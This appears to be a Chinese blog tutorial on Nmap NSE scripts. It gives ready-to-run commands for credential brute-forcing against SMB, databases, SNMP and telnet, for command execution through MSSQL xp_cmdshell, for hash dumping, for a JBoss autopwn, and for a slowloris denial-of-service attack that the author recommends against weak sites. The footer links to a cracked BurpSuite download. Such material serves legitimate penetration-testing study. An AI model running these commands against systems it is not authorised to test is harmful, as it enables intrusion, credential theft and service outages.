nmap的脚本默认目录为:/usr/share/nmap/scripts/
Nmap提供的命令行参数如下
-sC: 等价于–script=default,使用默认类别的脚本进行扫描 可更换其他类别 –script=<Lua scripts>: <Lua scripts>使用某个或某类脚本进行扫描,支持通配符描述 –script-args=<n1=v1,[n2=v2,…]>: 为脚本提供默认参数 –script-args-file=filename: 使用文件来为脚本提供参数 –script-trace: 显示脚本执行过程中发送与接收的数据 –script-updatedb: 更新脚本数据库 –script-help=<scripts>: 显示脚本的帮助信息,其中<scripts>部分可以逗号分隔的文件或脚本类别
nmap脚本主要分为以下几类,在扫描时可根据需要设置–script=类别这种方式进行比较笼统的扫描:
auth: 负责处理鉴权证书(绕开鉴权)的脚本 broadcast: 在局域网内探查更多服务开启状况,如dhcp/dns/sqlserver等服务 brute: 提供暴力破解方式,针对常见的应用如http/snmp等 default: 使用-sC或-A选项扫描时候默认的脚本,提供基本脚本扫描能力 discovery: 对网络进行更多的信息,如SMB枚举、SNMP查询等 dos: 用于进行拒绝服务攻击 exploit: 利用已知的漏洞入侵系统 external: 利用第三方的数据库或资源,例如进行whois解析 fuzzer: 模糊测试的脚本,发送异常的包到目标机,探测出潜在漏洞 intrusive: 入侵性的脚本,此类脚本可能引发对方的IDS/IPS的记录或屏蔽 malware: 探测目标机是否感染了病毒、开启了后门等信息 safe: 此类与intrusive相反,属于安全性脚本 version: 负责增强服务与版本扫描(Version Detection)功能的脚本 vuln: 负责检查目标机是否有常见的漏洞(Vulnerability),如是否有MS08_067
部分使用截图:
(1) nmap --script=auth 192.168.137.*
负责处理鉴权证书(绕开鉴权)的脚本,也可以作为检测部分应用弱口令


(2)nmap --script=brute 192.168.137.*
提供暴力破解的方式 可对数据库,smb,snmp等进行简单密码的暴力猜解

(3)nmap --script=default 192.168.137.* 或者 nmap -sC 192.168.137.*
默认的脚本扫描,主要是搜集各种应用服务的信息,收集到后,可再针对具体服务进行攻击


(4)nmap --script=vuln 192.168.137.*
检查是否存在常见漏洞



(5)nmap -n -p445 --script=broadcast 192.168.137.4
在局域网内探查更多服务开启状况

(6)nmap --script external 202.103.243.110
利用第三方的数据库或资源,例如进行whois解析

0x02 nmap按应用服务扫描
(1)vnc扫描:
检查vnc bypass
| 1 | nmap  --script=realvnc-auth-bypass 192.168.137.4   | 


检查vnc认证方式
| 1 | nmap  --script=vnc-auth  192.168.137.4   | 
获取vnc信息
| 1 | nmap  --script=vnc-info  192.168.137.4   | 
(2)smb扫描:
smb破解
| 1 | nmap  --script=smb-brute.nse 192.168.137.4   | 
smb字典破解
| 1 | nmap --script=smb-brute.nse --script-args=userdb=/var/passwd,passdb=/var/passwd192.168.137.4   | 

smb已知几个严重漏
| 1 | nmap  --script=smb-check-vulns.nse --script-args=unsafe=1 192.168.137.4     | 

查看共享目录
| 1 | nmap -p 445  --script smb-ls--script-args ‘share=e$,path=\,smbuser=test,smbpass=test’ 192.168.137.4     | 
查询主机一些敏感信息(注:需要下载nmap_service)
| 1 | nmap -p 445 -n –script=smb-psexec --script-args= smbuser=test,smbpass=test192.168.137.4    | 

查看会话
| 1 | nmap -n -p445 --script=smb-enum-sessions.nse --script-args=smbuser=test,smbpass=test192.168.137.4     | 
系统信息
| 1 | nmap -n -p445 --script=smb-os-discovery.nse --script-args=smbuser=test,smbpass=test192.168.137.4   | 
(3)Mssql扫描:
猜解mssql用户名和密码
| 1 | nmap -p1433 --script=ms-sql-brute --script-args=userdb=/var/passwd,passdb=/var/passwd192.168.137.4     | 

xp_cmdshell 执行命令
| 1 | nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="net user"192.168.137.4        | 

dumphash值
| 1 | nmap -p 1433 --script ms-sql-dump-hashes.nse --script-args mssql.username=sa,mssql.password=sa  192.168.137.4       | 

(4)Mysql扫描:
扫描root空口令
| 1 | nmap -p3306 --script=mysql-empty-password.nse 192.168.137.4    | 

列出所有mysql用户
| 1 | nmap -p3306 --script=mysql-users.nse --script-args=mysqluser=root 192.168.137.4    | 
支持同一应用的所有脚本扫描
| 1 | nmap --script=mysql-* 192.168.137.4   | 

(5)Oracle扫描:
oracle sid扫描
| 1 | nmap --script=oracle-sid-brute -p 1521-1560 192.168.137.5    | 

oracle弱口令破解
| 1 | nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL,userdb=/var/passwd,passdb=/var/passwd192.168.137.5       | 

(6)其他一些比较好用的脚本
nmap --script=broadcast-netbios-master-browser 192.168.137.4   发现网关  
nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' 192.168.137.4  破解rsync  
nmap --script informix-brute -p 9088 192.168.137.4    informix数据库破解  
nmap -p 5432 --script pgsql-brute 192.168.137.4       pgsql破解  
nmap -sU --script snmp-brute 192.168.137.4            snmp破解  
nmap -sV --script=telnet-brute 192.168.137.4          telnet破解  
nmap --script=http-vuln-cve2010-0738 --script-args 'http-vuln-cve2010-0738.paths={/path1/,/path2/}' <target>  jboss autopwn  
nmap --script=http-methods.nse 192.168.137.4 检查http方法  
nmap --script http-slowloris --max-parallelism 400 192.168.137.4  dos攻击,对于处理能力较小的站点还挺好用的 'half-HTTP' connections   
nmap --script=samba-vuln-cve-2012-1182  -p 139 192.168.137.4
(7)不靠谱的脚本:
vnc-brute 次数多了会禁止连接
pcanywhere-brute 同上

0x03 学会脚本分析
nmap中脚本并不难看懂,所以在使用时如果不知道原理可以直接看利用脚本即可,也可以修改其中的某些参数方便自己使用。
举例:
关于oracle的弱口令破解:
调用过程:oracle-brute.nse >> oracle-default-accounts.lst
首先是调用破解脚本:

根据脚本中字典的位置去查看默认字典,当然也可以将破解的字符自行添加其中,或者是修改脚本或参数改变破解字典:

最后附送大家一个nmap scripts帮助手册。

![扫一扫本文二维码,分享给大家 nmap脚本扫描使用总结[附手册下载]](https://www.vuln.cn/wp-content/themes/wpgo/caches/e63bad0aa3e1514384c5884047bee1ed.jpg) 
					 
		 
		
 
									![Connectify Dispatch指定程序使用指定网卡[运维神器]](http://www.vuln.cn/wp-content/uploads/2016/11/1.jpg) 
									![网站备案流程_网站备案需要什么[简单明了解决备案各种问题]](http://www.vuln.cn/wp-content/uploads/2014/03/topleft.gif) 
									![最新BurpSuite 1.7.32 破解版[注册机]下载【无后门版】](http://www.vuln.cn/wp-content/uploads/2018/02/ee462f76d3e2440f67041f92499c36ae.png) 
									![php一句话后门的几种变形分析[preg_replace函数]](http://www.vuln.cn/wp-content/uploads/2016/11/11.jpg) 
									 
									 
									 
									 
									![[网盘下载] GB/T 23031. 1 — 2022 工业互联网平台 应用实施指南 第一部分:总则.pdf](http://www.vuln.cn/wp-content/uploads/2023/02/3faee12ec28ab59793fbe1c203b8363f.png) 
									![[网盘下载] GB/T 41870-2022 工业互联网平台 企业应用水平与绩效评价.pdf](http://www.vuln.cn/wp-content/uploads/2023/02/4ec246e126c4f3a41d9ced588c790998.png) 
									![[网盘下载] GB/T 36323-2018 信息安全技术 工业控制系统安全管理基本要求.pdf](http://www.vuln.cn/wp-content/uploads/2023/02/f6adb0f6fa49a734846c5873d178bfbc.png) 
									![[网盘下载] GB/T 32919 -2016 信息安全技术 工业控制系统安全控制应用指南.pdf](http://www.vuln.cn/wp-content/uploads/2023/02/da9420e72b7af6bfb4fa273884dcefc1.png) 
									 
									 
	 云悉指纹
云悉指纹